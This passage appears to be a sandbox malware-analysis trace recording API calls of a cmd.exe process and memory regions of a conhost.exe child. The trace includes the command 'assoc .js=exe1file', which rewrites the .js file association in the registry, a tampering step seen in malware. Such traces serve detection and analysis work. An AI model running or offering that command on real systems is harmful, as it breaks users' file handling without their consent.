lpcbData=0x19ee80*=0x4) returned 0x0 [0274.528] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0274.528] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0274.528] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0274.528] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0274.528] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0274.528] RegCloseKey (hKey=0x94) returned 0x0 [0274.528] time (in: timer=0x0 | out: timer=0x0) returned 0x620b752e [0274.528] srand (_Seed=0x620b752e) [0274.528] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C assoc .js=exe1file" [0274.528] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C assoc .js=exe1file" [0274.528] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0274.529] GetProcessHeap () returned 0x4b0000 [0274.529] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x210) returned 0x4b9b50 [0274.529] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b9b58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0274.529] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0274.529] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0274.529] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0274.529] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0274.529] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0274.529] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0274.529] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0274.529] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0274.529] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0274.529] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0274.529] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0274.529] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0274.530] GetProcessHeap () returned 0x4b0000 [0274.530] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4b8700) returned 1 [0274.530] GetEnvironmentStringsW () returned 0x4b7cd8* [0274.530] GetProcessHeap () returned 0x4b0000 [0274.531] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xa32) returned 0x4ba7a8 [0274.531] FreeEnvironmentStringsA (penv="A") returned 1 [0274.533] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0274.533] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0274.534] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0274.534] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0274.534] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0274.534] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0274.534] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0274.534] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0274.534] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0274.534] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0274.534] GetProcessHeap () returned 0x4b0000 [0274.534] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x44) returned 0x4b05c8 [0274.534] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0274.534] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0274.534] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0274.534] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4b0618 [0274.535] FindClose (in: hFindFile=0x4b0618 | out: hFindFile=0x4b0618) returned 1 [0274.535] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x4b0618 [0274.535] FindClose (in: hFindFile=0x4b0618 | out: hFindFile=0x4b0618) returned 1 [0274.535] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0274.535] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4b0618 [0274.535] FindClose (in: hFindFile=0x4b0618 | out: hFindFile=0x4b0618) returned 1 [0274.535] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0274.536] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0274.536] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0274.536] GetProcessHeap () returned 0x4b0000 [0274.536] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4ba7a8) returned 1 [0274.536] GetEnvironmentStringsW () returned 0x4b7cd8* [0274.536] GetProcessHeap () returned 0x4b0000 [0274.536] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xa76) returned 0x4b9d68 [0274.536] FreeEnvironmentStringsA (penv="=") returned 1 [0274.536] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0274.536] GetProcessHeap () returned 0x4b0000 [0274.537] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4b05c8) returned 1 [0274.537] GetProcessHeap () returned 0x4b0000 [0274.537] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x400e) returned 0x4bbc68 [0274.537] GetProcessHeap () returned 0x4b0000 [0274.537] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x32) returned 0x4ba7e8 [0274.537] GetProcessHeap () returned 0x4b0000 [0274.538] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4bbc68) returned 1 [0274.538] GetConsoleOutputCP () returned 0x1b5 [0274.541] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0274.541] GetUserDefaultLCID () returned 0x409 [0274.542] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd334a0, cchData=8 | out: lpLCData=":") returned 2 [0274.542] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0274.542] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0274.542] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0274.542] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd334b0, cchData=8 | out: lpLCData="/") returned 2 [0274.542] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd33500, cchData=32 | out: lpLCData="Mon") returned 4 [0274.542] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd33540, cchData=32 | out: lpLCData="Tue") returned 4 [0274.542] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd33580, cchData=32 | out: lpLCData="Wed") returned 4 [0274.542] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd335c0, cchData=32 | out: lpLCData="Thu") returned 4 [0274.542] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd33600, cchData=32 | out: lpLCData="Fri") returned 4 [0274.542] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd33640, cchData=32 | out: lpLCData="Sat") returned 4 [0274.542] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd33680, cchData=32 | out: lpLCData="Sun") returned 4 [0274.542] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd334c0, cchData=8 | out: lpLCData=".") returned 2 [0274.542] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd334e0, cchData=8 | out: lpLCData=",") returned 2 [0274.542] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0274.544] GetProcessHeap () returned 0x4b0000 [0274.544] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x0, Size=0x20c) returned 0x4ba870 [0274.544] GetConsoleTitleW (in: lpConsoleTitle=0x4ba870, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0274.547] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0274.547] GetProcAddress (hModule=0x74f30000, lpProcName="CopyFileExW") returned 0x74f4ffc0 [0274.547] GetProcAddress (hModule=0x74f30000, lpProcName="IsDebuggerPresent") returned 0x74f4b0b0 [0274.548] GetProcAddress (hModule=0x74f30000, lpProcName="SetConsoleInputExeNameW") returned 0x76beb440 [0274.549] GetProcessHeap () returned 0x4b0000 [0274.549] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x400a) returned 0x4bbc68 [0274.549] GetProcessHeap () returned 0x4b0000 [0274.549] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4bbc68) returned 1 [0274.550] _wcsicmp (_String1="assoc", _String2=")") returned 56 [0274.550] _wcsicmp (_String1="FOR", _String2="assoc") returned 5 [0274.550] _wcsicmp (_String1="FOR/?", _String2="assoc") returned 5 [0274.550] _wcsicmp (_String1="IF", _String2="assoc") returned 8 [0274.550] _wcsicmp (_String1="IF/?", _String2="assoc") returned 8 [0274.550] _wcsicmp (_String1="REM", _String2="assoc") returned 17 [0274.550] _wcsicmp (_String1="REM/?", _String2="assoc") returned 17 [0274.550] GetProcessHeap () returned 0x4b0000 [0274.550] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x58) returned 0x4baa88 [0274.550] GetProcessHeap () returned 0x4b0000 [0274.550] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x14) returned 0x4b7780 [0274.551] GetProcessHeap () returned 0x4b0000 [0274.551] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x24) returned 0x4b0578 [0274.553] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0274.554] _wcsicmp (_String1="assoc", _String2="DIR") returned -3 [0274.554] _wcsicmp (_String1="assoc", _String2="ERASE") returned -4 [0274.554] _wcsicmp (_String1="assoc", _String2="DEL") returned -3 [0274.554] _wcsicmp (_String1="assoc", _String2="TYPE") returned -19 [0274.554] _wcsicmp (_String1="assoc", _String2="COPY") returned -2 [0274.554] _wcsicmp (_String1="assoc", _String2="CD") returned -2 [0274.554] _wcsicmp (_String1="assoc", _String2="CHDIR") returned -2 [0274.554] _wcsicmp (_String1="assoc", _String2="RENAME") returned -17 [0274.554] _wcsicmp (_String1="assoc", _String2="REN") returned -17 [0274.554] _wcsicmp (_String1="assoc", _String2="ECHO") returned -4 [0274.554] _wcsicmp (_String1="assoc", _String2="SET") returned -18 [0274.554] _wcsicmp (_String1="assoc", _String2="PAUSE") returned -15 [0274.554] _wcsicmp (_String1="assoc", _String2="DATE") returned -3 [0274.554] _wcsicmp (_String1="assoc", _String2="TIME") returned -19 [0274.554] _wcsicmp (_String1="assoc", _String2="PROMPT") returned -15 [0274.554] _wcsicmp (_String1="assoc", _String2="MD") returned -12 [0274.554] _wcsicmp (_String1="assoc", _String2="MKDIR") returned -12 [0274.554] _wcsicmp (_String1="assoc", _String2="RD") returned -17 [0274.554] _wcsicmp (_String1="assoc", _String2="RMDIR") returned -17 [0274.554] _wcsicmp (_String1="assoc", _String2="PATH") returned -15 [0274.554] _wcsicmp (_String1="assoc", _String2="GOTO") returned -6 [0274.554] _wcsicmp (_String1="assoc", _String2="SHIFT") returned -18 [0274.555] _wcsicmp (_String1="assoc", _String2="CLS") returned -2 [0274.555] _wcsicmp (_String1="assoc", _String2="CALL") returned -2 [0274.555] _wcsicmp (_String1="assoc", _String2="VERIFY") returned -21 [0274.555] _wcsicmp (_String1="assoc", _String2="VER") returned -21 [0274.555] _wcsicmp (_String1="assoc", _String2="VOL") returned -21 [0274.555] _wcsicmp (_String1="assoc", _String2="EXIT") returned -4 [0274.555] _wcsicmp (_String1="assoc", _String2="SETLOCAL") returned -18 [0274.555] _wcsicmp (_String1="assoc", _String2="ENDLOCAL") returned -4 [0274.555] _wcsicmp (_String1="assoc", _String2="TITLE") returned -19 [0274.555] _wcsicmp (_String1="assoc", _String2="START") returned -18 [0274.555] _wcsicmp (_String1="assoc", _String2="DPATH") returned -3 [0274.555] _wcsicmp (_String1="assoc", _String2="KEYS") returned -10 [0274.555] _wcsicmp (_String1="assoc", _String2="MOVE") returned -12 [0274.555] _wcsicmp (_String1="assoc", _String2="PUSHD") returned -15 [0274.555] _wcsicmp (_String1="assoc", _String2="POPD") returned -15 [0274.555] _wcsicmp (_String1="assoc", _String2="ASSOC") returned 0 [0274.555] GetProcessHeap () returned 0x4b0000 [0274.555] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x40) returned 0x4baae8 [0274.556] GetProcessHeap () returned 0x4b0000 [0274.557] RtlReAllocateHeap (Heap=0x4b0000, Flags=0x0, Ptr=0x4baae8, Size=0x24) returned 0x4baae8 [0274.557] GetProcessHeap () returned 0x4b0000 [0274.557] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4baae8) returned 0x24 [0274.557] GetProcessHeap () returned 0x4b0000 [0274.557] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x30) returned 0x4bab18 [0274.557] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Classes", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19fa14 | out: phkResult=0x19fa14*=0xa0) returned 0x0 [0274.557] GetProcessHeap () returned 0x4b0000 [0274.557] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x40) returned 0x4bab50 [0274.558] GetProcessHeap () returned 0x4b0000 [0274.558] RtlReAllocateHeap (Heap=0x4b0000, Flags=0x0, Ptr=0x4bab50, Size=0x28) returned 0x4bab50 [0274.558] GetProcessHeap () returned 0x4b0000 [0274.558] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4bab50) returned 0x28 [0274.558] GetProcessHeap () returned 0x4b0000 [0274.558] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x10) returned 0x4bab80 [0274.559] GetProcessHeap () returned 0x4b0000 [0274.559] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x1a) returned 0x4bab98 [0274.559] RegCreateKeyExW (in: hKey=0xa0, lpSubKey=".js", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x19f9cc, lpdwDisposition=0x0 | out: phkResult=0x19f9cc*=0xa4, lpdwDisposition=0x0) returned 0x0 [0274.559] RegSetValueExW (in: hKey=0xa4, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="exe1file", cbData=0x12 | out: lpData="exe1file") returned 0x0 [0274.559] RegCloseKey (hKey=0xa4) returned 0x0 [0274.559] _vsnwprintf (in: _Buffer=0xd37940, _BufferCount=0x1fff, _Format="%s=%s\r\n", _ArgList=0x19f9ac | out: _Buffer=".js=exe1file\r\n") returned 14 [0274.560] _get_osfhandle (_FileHandle=1) returned 0x3c [0274.560] GetFileType (hFile=0x3c) returned 0x2 [0274.560] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0274.560] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f984 | out: lpMode=0x19f984) returned 1 [0274.560] _get_osfhandle (_FileHandle=1) returned 0x3c [0274.560] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd37940*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x19f99c, lpReserved=0x0 | out: lpBuffer=0xd37940*, lpNumberOfCharsWritten=0x19f99c*=0xe) returned 1 [0274.561] ApiSetQueryApiSetPresence () returned 0x0 [0274.561] ResolveDelayLoadedAPI () returned 0x6ab62230 [0274.566] DoSHChangeNotify () returned 0x0 [0274.708] GetProcessHeap () returned 0x4b0000 [0274.709] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4bab98) returned 1 [0274.709] GetProcessHeap () returned 0x4b0000 [0274.709] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4bab80) returned 1 [0274.709] RegCloseKey (hKey=0xa0) returned 0x0 [0274.709] _get_osfhandle (_FileHandle=1) returned 0x3c [0274.709] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0274.723] _get_osfhandle (_FileHandle=1) returned 0x3c [0274.723] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0274.737] _get_osfhandle (_FileHandle=0) returned 0x38 [0274.737] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0274.754] SetConsoleInputExeNameW () returned 0x1 [0274.754] GetConsoleOutputCP () returned 0x1b5 [0274.788] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0274.788] SetThreadUILanguage (LangId=0x0) returned 0x409 [0274.803] exit (_Code=0) Thread: id = 176 os_tid = 0x790 Process: id = "26" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3ae60000" os_pid = "0x2a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x794" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2358 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2359 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2360 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2361 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2362 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2363 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2364 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2365 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2366 start_va = 0x7ff7625c0000 end_va = 0x7ff7625d0fff monitored = 0 entry_point = 0x7ff7625c16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2367 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2368 start_va = 0x770000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 2369 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2370 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2371 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2372 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2373 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2374 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2375 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2376 start_va = 0x600000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2377 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2378 start_va = 0x7ffd45030000 end_va = 0x7ffd45088fff monitored = 0 entry_point = 0x7ffd4503fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2379 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2380 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2381 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2382 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2383 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2384 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2385 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2386 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2387 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2388 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2389 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2390 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2391 